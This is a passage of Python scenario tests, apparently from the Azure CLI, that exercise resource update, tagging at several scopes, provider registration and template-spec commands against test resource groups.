        self.cmd('resource update --id {subnet_id} --set properties.addressPrefix=10.0.0.0/22',
                 checks=self.check('properties.addressPrefix', '10.0.0.0/22'))
        self.cmd('resource delete --id {subnet_id}', checks=self.is_empty())
        self.cmd('resource delete --id {vnet_id}', checks=self.is_empty())
class ResourceGenericUpdate(LiveScenarioTest):
    """Live-only test of generic update (`--set` / `--remove`) fan-out across multiple --ids."""

    @ResourceGroupPreparer(name_prefix='cli_test_generic_update')
    def test_resource_generic_update(self, resource_group):
        """Set and then incrementally remove tags on two storage accounts in one command."""
        self.kwargs.update({
            'stor_1': self.create_random_name(prefix='stor1', length=10),
            'stor_2': self.create_random_name(prefix='stor2', length=10)
        })
        # create storage accounts
        self.cmd('az storage account create -g {rg} -n {stor_1}')
        self.cmd('az storage account create -g {rg} -n {stor_2}')
        # get ids (space-separated so both can be passed to a single --ids)
        self.kwargs['stor_ids'] = " ".join(self.cmd('az storage account list -g {rg} --query "[].id"').get_output_in_json())
        # update tags on both accounts at once
        self.cmd('az storage account update --ids {stor_ids} --set tags.isTag=True tags.isNotTag=False')
        self.cmd('az storage account show --name {stor_1} -g {rg}', checks=[
            self.check('tags.isTag', 'True'),
            self.check('tags.isNotTag', 'False')
        ])
        self.cmd('az storage account show --name {stor_2} -g {rg}', checks=[
            self.check('tags.isTag', 'True'),
            self.check('tags.isNotTag', 'False')
        ])
        # delete tags.isTag
        self.cmd('az storage account update --ids {stor_ids} --remove tags.isTag')
        self.cmd('az storage account show --name {stor_1} -g {rg} --query "tags"', checks=[
            self.check('isNotTag', 'False'),
            self.check('isTag', None)
        ])
        self.cmd('az storage account show --name {stor_2} -g {rg} --query "tags"', checks=[
            self.check('isNotTag', 'False'),
            self.check('isTag', None)
        ])
        # delete tags.isNotTag
        self.cmd('az storage account update --ids {stor_ids} --remove tags.isNotTag')
        # check tags is empty.
        self.cmd('az storage account show --name {stor_1} -g {rg} --query "tags"', checks=self.is_empty())
        self.cmd('az storage account show --name {stor_2} -g {rg} --query "tags"', checks=self.is_empty())
class ResourceCreateAndShowScenarioTest(ScenarioTest):
    """Tests `az resource create/show` with inline JSON --properties payloads."""

    @ResourceGroupPreparer(name_prefix='cli_test_resource_create')
    def test_resource_create_and_show(self, resource_group, resource_group_location):
        """Create an app service plan and web app generically, then create/show
        child config resources by ID, including --include-response-body."""
        self.kwargs.update({
            'plan': 'cli_res_create_plan',
            'app': 'clirescreateweb2',
            'loc': resource_group_location
        })
        # --is-full-object: the JSON payload carries top-level location/sku, not just properties.
        self.cmd('resource create -g {rg} -n {plan} --resource-type Microsoft.web/serverFarms --is-full-object --properties "{{\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"B1\\",\\"tier\\":\\"BASIC\\"}}}}"',
                 checks=self.check('name', '{plan}'))
        result = self.cmd('resource create -g {rg} -n {app} --resource-type Microsoft.web/sites --properties "{{\\"serverFarmId\\":\\"{plan}\\"}}"',
                          checks=self.check('name', '{app}')).get_output_in_json()
        # Child config resources are addressed by appending to the site's resource ID.
        self.kwargs['app_settings_id'] = result['id'] + '/config/appsettings'
        self.kwargs['app_config_id'] = result['id'] + '/config/web'
        self.cmd('resource create --id {app_settings_id} --properties "{{\\"key2\\":\\"value12\\"}}"',
                 checks=[self.check('properties.key2', 'value12')])
        self.cmd('resource show --id {app_config_id}',
                 checks=self.check('properties.publishingUsername', '${app}'))
        # --include-response-body surfaces the raw response under responseBody.
        self.cmd('resource show --id {app_config_id} --include-response-body',
                 checks=self.check('responseBody.properties.publishingUsername', '${app}'))
class TagScenarioTest(ScenarioTest):
    """Tests for `az tag`: the legacy subscription-wide tag name/value commands,
    tag patching on various resource types, and the newer resource-scoped
    tag create/update/list/delete commands (subscription, resource group,
    and tracked-resource scopes)."""

    def test_tag_scenario(self):
        """Legacy tag name/value lifecycle: create, add/remove values, delete."""
        self.kwargs.update({
            'tag': 'cli_test_tag'
        })
        # Clean up any leftover values/name from a previous failed run.
        tag_values = self.cmd('tag list --query "[?tagName == \'{tag}\'].values[].tagValue"').get_output_in_json()
        for tag_value in tag_values:
            self.cmd('tag remove-value --value {} -n {{tag}}'.format(tag_value))
        self.cmd('tag delete -n {tag} -y')
        self.cmd('tag list --query "[?tagName == \'{tag}\']"', checks=self.is_empty())
        self.cmd('tag create -n {tag}', checks=[
            self.check('tagName', '{tag}'),
            self.check('values', []),
            self.check('count.value', 0)
        ])
        self.cmd('tag add-value -n {tag} --value test')
        self.cmd('tag add-value -n {tag} --value test2')
        self.cmd('tag list --query "[?tagName == \'{tag}\']"',
                 checks=self.check('[].values[].tagValue', [u'test', u'test2']))
        self.cmd('tag remove-value -n {tag} --value test')
        self.cmd('tag list --query "[?tagName == \'{tag}\']"',
                 checks=self.check('[].values[].tagValue', [u'test2']))
        self.cmd('tag remove-value -n {tag} --value test2')
        self.cmd('tag list --query "[?tagName == \'{tag}\']"',
                 checks=self.check('[].values[].tagValue', []))
        self.cmd('tag delete -n {tag} -y')
        self.cmd('tag list --query "[?tagName == \'{tag}\']"',
                 checks=self.is_empty())

    @ResourceGroupPreparer(name_prefix='cli_test_tag_update_by_patch', location='westus')
    def test_tag_update_by_patch(self, resource_group, resource_group_location):
        """`resource tag` (PATCH path) on several resource types, singly and with multiple --ids."""
        # Test Microsoft.RecoveryServices/vaults
        self.kwargs.update({
            'loc': resource_group_location,
            'vault': self.create_random_name('vault-', 30),
            'tag': 'cli-test=test',
            'resource_group_id': '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
        })
        vault = self.cmd('resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults '
                         '--is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",'
                         '\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
                         checks=self.check('name', '{vault}')).get_output_in_json()
        self.kwargs['vault_id'] = vault['id']
        self.cmd('resource tag --ids {vault_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
        # Empty --tags clears all tags.
        self.cmd('resource tag --ids {vault_id} --tags', checks=self.check('tags', {}))
        # Test Microsoft.Resources/resourceGroups
        self.cmd('resource tag --ids {resource_group_id} --tags {tag}',
                 checks=self.check('tags', {'cli-test': 'test'}))
        # Test Microsoft.ContainerRegistry/registries/webhooks
        self.kwargs.update({
            'registry_name': self.create_random_name('clireg', 20),
            'webhook_name': 'cliregwebhook',
            'rg_loc': resource_group_location,
            'uri': 'http://www.microsoft.com',
            'actions': 'push',
            'sku': 'Standard'
        })
        self.cmd('acr create -n {registry_name} -g {rg} -l {rg_loc} --sku {sku}',
                 checks=[self.check('name', '{registry_name}')])
        webhook = self.cmd('acr webhook create -n {webhook_name} -r {registry_name} --uri {uri} --actions {actions}',
                           checks=[self.check('name', '{webhook_name}')]).get_output_in_json()
        self.kwargs['webhook_id'] = webhook['id']
        self.cmd('resource tag --ids {webhook_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
        self.cmd('resource tag --ids {webhook_id} --tags', checks=self.check('tags', {}))
        # Test Microsoft.ContainerInstance/containerGroups
        self.kwargs.update({
            'container_group_name': self.create_random_name('clicontainer', 16),
            'image': 'nginx:latest',
        })
        container = self.cmd('container create -g {rg} -n {container_group_name} --image {image}',
                             checks=self.check('name', '{container_group_name}')).get_output_in_json()
        self.kwargs['container_id'] = container['id']
        self.cmd('resource tag --ids {container_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
        self.cmd('resource tag --ids {container_id} --tags', checks=self.check('tags', {}))
        # Multiple --ids at once should tag all three resources.
        self.cmd('resource tag --ids {vault_id} {webhook_id} {container_id} --tags {tag}', checks=[
            self.check('length(@)', 3),
            self.check('[0].tags', {'cli-test': 'test'})
        ])
        self.cmd('resource delete --id {vault_id}', checks=self.is_empty())
        self.cmd('resource delete --id {webhook_id}', checks=self.is_empty())

    @ResourceGroupPreparer(name_prefix='cli_test_tag_incrementally', location='westus')
    def test_tag_incrementally(self, resource_group, resource_group_location):
        """`resource tag -i` merges new tags instead of replacing; empty tags with -i is rejected."""
        self.kwargs.update({
            'loc': resource_group_location,
            'vault': self.create_random_name('vault-', 30),
        })
        resource = self.cmd(
            'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
            checks=self.check('name', '{vault}')).get_output_in_json()
        self.kwargs['vault_id'] = resource['id']
        self.cmd('resource tag --ids {vault_id} --tags cli-test=test cli-test2=test2', checks=self.check('tags', {'cli-test': 'test', 'cli-test2': 'test2'}))
        # Without -i the tag set is replaced wholesale.
        self.cmd('resource tag --ids {vault_id} --tags cli-test3=test3 cli-test4=test4', checks=self.check('tags', {'cli-test3': 'test3', 'cli-test4': 'test4'}))
        # With -i existing tags are kept; matching keys are overwritten.
        self.cmd('resource tag --ids {vault_id} --tags cli-test4=test4a cli-test5=test5 -i',
                 checks=self.check('tags', {'cli-test3': 'test3', 'cli-test4': 'test4a', 'cli-test5': 'test5'}))
        # Incremental mode with no tags to merge is an error.
        with self.assertRaises(CLIError):
            self.cmd('resource tag --ids {vault_id} --tags -i ')
        with self.assertRaises(CLIError):
            self.cmd('resource tag --ids {vault_id} --tags "" -i ')
        self.cmd('resource tag --ids {vault_id} --tags', checks=self.check('tags', {}))
        self.cmd('resource delete --id {vault_id}', checks=self.is_empty())

    @ResourceGroupPreparer(name_prefix='cli_test_tag_default_location_scenario', location='westus')
    def test_tag_default_location_scenario(self, resource_group, resource_group_location):
        """`resource list --tag` must reject any location argument, whether it comes
        from a configured default or from -l/--location on the command line."""
        self.kwargs.update({
            'loc': resource_group_location,
            'vault': self.create_random_name('vault-', 30),
            'tag': 'cli-test=test'
        })
        resource = self.cmd(
            'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p '
            '"{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
            checks=self.check('name', '{vault}')).get_output_in_json()
        self.kwargs['vault_id'] = resource['id']
        self.cmd('resource tag --ids {vault_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
        # Scenarios with default location
        self.cmd('configure --defaults location={loc}')
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag}')
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag} -l westus')
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag} --l westus')
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag} --location westus')
        # Scenarios without default location
        self.cmd('configure --defaults location=""')
        self.cmd('resource list --tag {tag}', checks=self.check('[0].id', '{vault_id}'))
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag} -l westus')
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag} --l westus')
        with self.assertRaises(IncorrectUsageError):
            self.cmd('resource list --tag {tag} --location westus')
        self.cmd('resource delete --id {vault_id}', checks=self.is_empty())

    def test_tag_create_or_update_subscription(self):
        """tag create at subscription scope."""
        subscription_id = '/subscriptions/' + self.get_subscription_id()
        self.utility_tag_create_or_update_scope(resource_id=subscription_id)

    @ResourceGroupPreparer(name_prefix='test_tag_create_or_update_resourcegroup', location='westus')
    def test_tag_create_or_update_resourcegroup(self, resource_group):
        """tag create at resource-group scope."""
        resource_group_id = '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
        self.utility_tag_create_or_update_scope(resource_id=resource_group_id)

    @ResourceGroupPreparer(name_prefix='test_tag_create_or_update_resource', location='westus')
    def test_tag_create_or_update_resource(self, resource_group_location):
        """tag create at tracked-resource scope (a Recovery Services vault)."""
        self.kwargs.update({
            'loc': resource_group_location,
            'vault': self.create_random_name('vault-', 30)
        })
        resource = self.cmd(
            'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
            checks=self.check('name', '{vault}')).get_output_in_json()
        self.utility_tag_create_or_update_scope(resource_id=resource['id'])

    # Utility method to test CreateOrUpdate for Tags within subscription, resource group, and tracked resources.
    def utility_tag_create_or_update_scope(self, resource_id):
        """Shared assertions for `tag create --resource-id` at any scope."""
        self.kwargs.update({
            'resource_id': resource_id,
            'expected_tags1': 'cliName1=cliValue1 cliName2=cliValue2',
            'expected_tags2': 'cliName1=cliValue1 cliName2='
        })
        # 1. pass in an empty tag set, should throw error
        with self.assertRaises(IncorrectUsageError):
            self.cmd('tag create --resource-id {resource_id} --tags', checks=self.check('tags', {}))
        # 2. pass in a complete tag string
        tag_dict1 = {'cliName1': 'cliValue1', 'cliName2': 'cliValue2'}
        self.cmd('tag create --resource-id {resource_id} --tags {expected_tags1}', checks=[
            self.check('properties.tags', tag_dict1)
        ])
        # 3. pass in one incomplete tag string (empty value is allowed)
        tag_dict2 = {'cliName1': 'cliValue1', 'cliName2': ''}
        self.cmd('tag create --resource-id {resource_id} --tags {expected_tags2}', checks=[
            self.check('properties.tags', tag_dict2)
        ])
        # 4. clean up: delete the existing tags
        self.cmd('tag delete --resource-id {resource_id} -y', checks=self.is_empty())

    def test_tag_update_subscription(self):
        """tag update at subscription scope."""
        subscription_id = '/subscriptions/' + self.get_subscription_id()
        self.utility_tag_update_scope(resource_id=subscription_id)

    @ResourceGroupPreparer(name_prefix='test_tag_update_resourcegroup', location='westus')
    def test_tag_update_resourcegroup(self, resource_group):
        """tag update at resource-group scope."""
        resource_group_id = '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
        self.utility_tag_update_scope(resource_id=resource_group_id)

    @ResourceGroupPreparer(name_prefix='test_tag_update_resource', location='westus')
    def test_tag_update_resource(self, resource_group_location):
        """tag update at tracked-resource scope (a Recovery Services vault)."""
        self.kwargs.update({
            'loc': resource_group_location,
            'vault': self.create_random_name('vault-', 30)
        })
        resource = self.cmd(
            'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
            checks=self.check('name', '{vault}')).get_output_in_json()
        self.utility_tag_update_scope(resource_id=resource['id'])

    # Utility method to test updating tags on subscription, resource group and tracked resource, including Merge, Replace, and Delete Operation.
    def utility_tag_update_scope(self, resource_id):
        """Shared assertions for `tag update --operation merge|replace|delete`."""
        self.kwargs.update({
            'resource_id': resource_id,
            'original_tags': 'cliName1=cliValue1 cliName2=cliValue2',
            'merge_tags': 'cliName1=cliValue1 cliName3=cliValue3',
            'replace_tags': 'cliName1=cliValue1 cliName4=cliValue4',
            'delete_tags': 'cliName4=cliValue4',
            'merge_operation': 'merge',
            'replace_operation': 'replace',
            'delete_operation': 'delete'
        })
        # setup original
        self.cmd('tag create --resource-id {resource_id} --tags {original_tags}')
        # 1. test merge operation: union of existing and supplied tags
        after_merge_tags_dict = {'cliName1': 'cliValue1', 'cliName2': 'cliValue2', 'cliName3': 'cliValue3'}
        self.cmd('tag update --resource-id {resource_id} --operation {merge_operation} --tags {merge_tags}', checks=[
            self.check('properties.tags', after_merge_tags_dict)
        ])
        # 2. test replace operation: supplied tags replace the whole set
        after_replace_tags_dict = {'cliName1': 'cliValue1', 'cliName4': 'cliValue4'}
        self.cmd('tag update --resource-id {resource_id} --operation {replace_operation} --tags {replace_tags}',
                 checks=[
                     self.check('properties.tags', after_replace_tags_dict)
                 ])
        # 3. test delete operation: supplied tags are removed from the set
        after_delete_tags_dict = {'cliName1': 'cliValue1'}
        self.cmd('tag update --resource-id {resource_id} --operation {delete_operation} --tags {delete_tags}', checks=[
            self.check('properties.tags', after_delete_tags_dict)
        ])
        # 4. clean up: delete the existing tags
        self.cmd('tag delete --resource-id {resource_id} -y', checks=self.is_empty())

    def test_tag_get_subscription(self):
        """tag list at subscription scope."""
        subscription_id = '/subscriptions/' + self.get_subscription_id()
        self.utility_tag_get_scope(resource_id=subscription_id)

    @ResourceGroupPreparer(name_prefix='test_tag_get_resourcegroup', location='westus')
    def test_tag_get_resourcegroup(self, resource_group):
        """tag list at resource-group scope."""
        resource_group_id = '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
        self.utility_tag_get_scope(resource_id=resource_group_id)

    @ResourceGroupPreparer(name_prefix='test_tag_get_resource', location='westus')
    def test_tag_get_resource(self, resource_group_location):
        """tag list at tracked-resource scope (a Recovery Services vault)."""
        self.kwargs.update({
            'loc': resource_group_location,
            'vault': self.create_random_name('vault-', 30)
        })
        resource = self.cmd(
            'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
            checks=self.check('name', '{vault}')).get_output_in_json()
        self.utility_tag_get_scope(resource_id=resource['id'])

    # Utility method to test Get for Tags within subscription, resource group and tracked resource.
    def utility_tag_get_scope(self, resource_id):
        """Shared assertions for `tag list --resource-id` at any scope."""
        self.kwargs.update({
            'resource_id': resource_id,
            'original_tags': 'cliName1=cliValue1 cliName2=cliValue2'
        })
        # setup original
        self.cmd('tag create --resource-id {resource_id} --tags {original_tags}')
        # test get operation
        expected_tags_dict = {'cliName1': 'cliValue1', 'cliName2': 'cliValue2'}
        self.cmd('tag list --resource-id {resource_id}', checks=[
            self.check('properties.tags', expected_tags_dict)
        ])
        # clean up: delete the existing tags
        self.cmd('tag delete --resource-id {resource_id} -y', checks=self.is_empty())
class ProviderRegistrationTest(ScenarioTest):
    """Tests for `az provider register/unregister`, including RPaaS providers
    (which require --accept-terms) and management-group scoped registration."""

    def test_provider_registration(self):
        """Round-trip register/unregister starting from whichever state the provider is in."""
        self.kwargs.update({'prov': 'Microsoft.ClassicInfrastructureMigrate'})
        result = self.cmd('provider show -n {prov}').get_output_in_json()
        if result['registrationState'] == 'Unregistered':
            self.cmd('provider register -n {prov}')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            # Registration is asynchronous: either the transitional or the final state is acceptable.
            # assertIn gives a useful failure message, unlike assertTrue(x in [...]).
            self.assertIn(result['registrationState'], ['Registering', 'Registered'])
            self.cmd('provider unregister -n {prov}')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            self.assertIn(result['registrationState'], ['Unregistering', 'Unregistered'])
        else:
            self.cmd('provider unregister -n {prov}')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            self.assertIn(result['registrationState'], ['Unregistering', 'Unregistered'])
            self.cmd('provider register -n {prov}')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            self.assertIn(result['registrationState'], ['Registering', 'Registered'])

    def test_provider_registration_rpaas(self):
        """RPaaS providers must be registered with --accept-terms; plain register fails."""
        self.kwargs.update({'prov': 'Microsoft.Confluent'})
        result = self.cmd('provider show -n {prov}').get_output_in_json()
        if result['registrationState'] == 'Unregistered':
            # assertRaisesRegexp is a deprecated alias removed in Python 3.12 — use assertRaisesRegex.
            with self.assertRaisesRegex(CLIError, '--accept-terms must be specified'):
                self.cmd('provider register -n {prov}')
            self.cmd('provider register -n {prov} --accept-terms')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            # BUG FIX: the original `assertTrue(result['registrationState'], 'Registered')`
            # passed 'Registered' as the failure *message*, so the assertion succeeded for
            # any non-empty state. Assert membership like the sibling checks instead.
            self.assertIn(result['registrationState'], ['Registering', 'Registered'])
            self.cmd('provider unregister -n {prov}')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            self.assertIn(result['registrationState'], ['Unregistering', 'Unregistered'])
        else:
            self.cmd('provider unregister -n {prov}')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            self.assertIn(result['registrationState'], ['Unregistering', 'Unregistered'])
            with self.assertRaisesRegex(CLIError, '--accept-terms must be specified'):
                self.cmd('provider register -n {prov}')
            self.cmd('provider register -n {prov} --accept-terms')
            result = self.cmd('provider show -n {prov}').get_output_in_json()
            # Same no-op assertTrue bug fixed here (see above).
            self.assertIn(result['registrationState'], ['Registering', 'Registered'])

    def test_provider_registration_mg(self):
        """Registration scoped to a management group (--m) should succeed."""
        self.kwargs.update({'prov': 'Microsoft.ClassicInfrastructureMigrate'})
        result = self.cmd('provider register -n {prov} --m testmg')
        # NOTE(review): the second argument is the assertion *message*; this only
        # checks that the command result object is truthy. Kept for parity with
        # the original behavior.
        self.assertTrue(result, None)
class ProviderOperationTest(ScenarioTest):
    """Tests `az provider operation show` for compute and storage namespaces."""

    def test_provider_operation(self):
        """Verify providerOperations metadata shape and a data-action flag."""
        self.cmd('provider operation show --namespace microsoft.compute', checks=[
            self.check('id', '/providers/Microsoft.Authorization/providerOperations/Microsoft.Compute'),
            self.check('type', 'Microsoft.Authorization/providerOperations')
        ])
        # NOTE(review): this call is an exact duplicate of the one above — possibly
        # intentional (re-fetch/caching), but looks redundant; confirm before removing.
        self.cmd('provider operation show --namespace microsoft.compute', checks=[
            self.check('id', '/providers/Microsoft.Authorization/providerOperations/Microsoft.Compute'),
            self.check('type', 'Microsoft.Authorization/providerOperations')
        ])
        self.cmd('provider operation show --namespace microsoft.storage', checks=[
            self.check("resourceTypes|[?name=='storageAccounts/blobServices/containers/blobs']|[0].operations[0].isDataAction", True),
        ])
class TemplateSpecsTest(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_template_specs_list', parameter_name='resource_group_one', location='westus')
    @ResourceGroupPreparer(name_prefix='cli_test_template_specs_list', location='westus')
    def test_list_template_spec(self, resource_group, resource_group_one, resource_group_location):
        """Create the same-named template spec in two resource groups (one version
        in {rg}, two versions in {rg1}) and verify `ts list` filtering by group,
        by group+name (lists versions), and subscription-wide."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        template_spec_name = self.create_random_name('cli-test-list-template-spec', 60)
        self.kwargs.update({
            'template_spec_name': template_spec_name,
            # Escape backslashes so Windows paths survive shell-style command formatting.
            'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
            'rg': resource_group,
            'rg1': resource_group_one,
            'resource_group_location': resource_group_location,
        })
        template_spec_in_rg = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
        template_spec_in_rg1_2 = self.cmd('ts create -g {rg1} -n {template_spec_name} -v 2.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
        template_spec_in_rg1_3 = self.cmd('ts create -g {rg1} -n {template_spec_name} -v 3.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
        # `ts create` returns the version resource ID; strip the suffix to get the parent spec ID.
        self.kwargs['template_spec_id_rg'] = template_spec_in_rg['id'].replace('/versions/1.0', '')
        self.kwargs['template_spec_version_id_rg1_2'] = template_spec_in_rg1_2['id']
        self.kwargs['template_spec_version_id_rg1_3'] = template_spec_in_rg1_3['id']
        self.kwargs['template_spec_id_rg1'] = template_spec_in_rg1_2['id'].replace('/versions/2.0', '')
        self.cmd('ts list -g {rg1}', checks=[
            self.check("length([?id=='{template_spec_id_rg}'])", 0),
            self.check("length([?id=='{template_spec_id_rg1}'])", 1),
        ])
        self.cmd('ts list -g {rg}', checks=[
            self.check("length([?id=='{template_spec_id_rg}'])", 1),
            self.check("length([?id=='{template_spec_id_rg1}'])", 0)
        ])
        # Listing by group + name enumerates the spec's versions.
        self.cmd('ts list -g {rg1} -n {template_spec_name}', checks=[
            self.check('length([])', 2),
            self.check("length([?id=='{template_spec_version_id_rg1_2}'])", 1),
            self.check("length([?id=='{template_spec_version_id_rg1_3}'])", 1)
        ])
        self.cmd('ts list', checks=[
            self.check("length([?id=='{template_spec_id_rg}'])", 1),
            self.check("length([?id=='{template_spec_id_rg1}'])", 1),
        ])
        # clean up
        self.cmd('ts delete --template-spec {template_spec_id_rg} --yes')
        self.cmd('ts delete --template-spec {template_spec_id_rg1} --yes')
    @ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
    def test_create_template_specs(self, resource_group, resource_group_location):
        """Create a template spec from a template containing multi-line string
        expressions and verify the expressions survive round-tripping; creating
        without a version (-v) must raise IncorrectUsageError."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        template_spec_name = self.create_random_name('cli-test-create-template-spec', 60)
        self.kwargs.update({
            'template_spec_name': template_spec_name,
            'tf': os.path.join(curr_dir, 'template_spec_with_multiline_strings.json').replace('\\', '\\\\'),
            'resource_group_location': resource_group_location,
            'description': '"AzCLI test root template spec"',
            'version_description': '"AzCLI test version of root template spec"',
        })
        # The checks pin exact ARM template expressions to catch any escaping/serialization drift.
        result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}" --description {description} --version-description {version_description}', checks=[
            self.check('template.variables.provider', "[split(parameters('resource'), '/')[0]]"),
            self.check('template.variables.resourceType', "[replace(parameters('resource'), concat(variables('provider'), '/'), '')]"),
            self.check('template.variables.hyphenedName', ("[format('[0]-[1]-[2]-[3]-[4]-[5]', parameters('customer'), variables('environments')[parameters('environment')], variables('locations')[parameters('location')], parameters('group'), parameters('service'), if(equals(parameters('kind'), ''), variables('resources')[variables('provider')][variables('resourceType')], variables('resources')[variables('provider')][variables('resourceType')][parameters('kind')]))]")),
            self.check('template.variables.removeOptionalsFromHyphenedName', "[replace(variables('hyphenedName'), '--', '-')]"),
            self.check('template.variables.isInstanceCount', "[greater(parameters('instance'), -1)]"),
            self.check('template.variables.hyphenedNameAfterInstanceCount', "[if(variables('isInstanceCount'), format('[0]-[1]', variables('removeOptionalsFromHyphenedName'), string(parameters('instance'))), variables('removeOptionalsFromHyphenedName'))]"),
            self.check('template.variables.name', "[if(parameters('useHyphen'), variables('hyphenedNameAfterInstanceCount'), replace(variables('hyphenedNameAfterInstanceCount'), '-', ''))]")
        ]).get_output_in_json()
        # Omitting -v is a usage error.
        with self.assertRaises(IncorrectUsageError):
            self.cmd('ts create --name {template_spec_name} -g {rg} -l {resource_group_location} --template-file "{tf}"')
        # clean up
        self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
        self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_create_template_specs_with_artifacts(self, resource_group, resource_group_location):
    """Create a template spec version from a template that references linked
    templates and verify the artifact paths recorded on the created version."""
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    template_spec_name = self.create_random_name('cli-test-create-template-spec', 60)
    self.kwargs.update({
        'template_spec_name': template_spec_name,
        'tf': os.path.join(curr_dir, 'template_spec_with_artifacts.json').replace('\\', '\\\\'),
        'resource_group_location': resource_group_location,
        'display_name': self.create_random_name('create-spec', 20),
        'description': '"AzCLI test root template spec"',
        'version_description': '"AzCLI test version of root template spec"',
    })
    # Copy the linked templates into an 'artifacts' folder next to the root
    # template, unless a previous run already created it.
    path = os.path.join(curr_dir, 'artifacts')
    if not os.path.exists(path):
        files = ['createKeyVault.json', 'createKeyVaultWithSecret.json', 'createResourceGroup.json']
        os.makedirs(path)
        for f in files:
            shutil.copy(os.path.join(curr_dir, f), path)
    # Create v1.0 with full metadata; the three linked templates must be
    # registered as artifacts on the new version.
    result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}" -d {display_name} --description {description} --version-description {version_description}', checks=[
        self.check('artifacts.length([])', 3),
        self.check_pattern('artifacts[0].path', 'artifacts.createResourceGroup.json'),
        self.check_pattern('artifacts[1].path', 'artifacts.createKeyVault.json'),
        self.check_pattern('artifacts[2].path', 'artifacts.createKeyVaultWithSecret.json')
    ]).get_output_in_json()
    # Re-creating the same version without metadata (--yes skips the overwrite
    # prompt) leaves description/display name unset on the result.
    self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -f "{tf}" --yes', checks=[
        self.check('description', None),
        self.check('display_name', None),
    ])
    # clean up
    self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
    self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_update_template_specs(self, resource_group, resource_group_location):
    """Update template-spec metadata (display name / descriptions) and replace a
    version's template with one that carries linked artifacts."""
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    template_spec_name = self.create_random_name('cli-test-update-template-spec', 60)
    self.kwargs.update({
        'template_spec_name': template_spec_name,
        'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
        'tf1': os.path.join(curr_dir, 'template_spec_with_artifacts.json').replace('\\', '\\\\'),
        'resource_group_location': resource_group_location,
        'display_name': self.create_random_name('create-spec', 20),
        'description': '"AzCLI test root template spec"',
        'version_description': '"AzCLI test version of root template spec"',
    })
    # Initial create: no metadata, no artifacts.
    result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"', checks=[
        self.check('name', '1.0'),
        self.check('description', None),
        self.check('display_name', None),
        self.check('artifacts.length([])', 0)]).get_output_in_json()
    self.kwargs['template_spec_version_id'] = result['id']
    self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
    # Update metadata on the parent template spec (id without '/versions/...').
    # The kwargs values carry literal quotes for shell quoting, so strip them
    # before comparing with the service response.
    self.cmd('ts update -s {template_spec_id} --display-name {display_name} --description {description} --yes', checks=[
        self.check('name', self.kwargs['template_spec_name']),
        self.check('description', self.kwargs['description'].replace('"', '')),
        self.check('displayName', self.kwargs['display_name'].replace('"', ''))
    ])
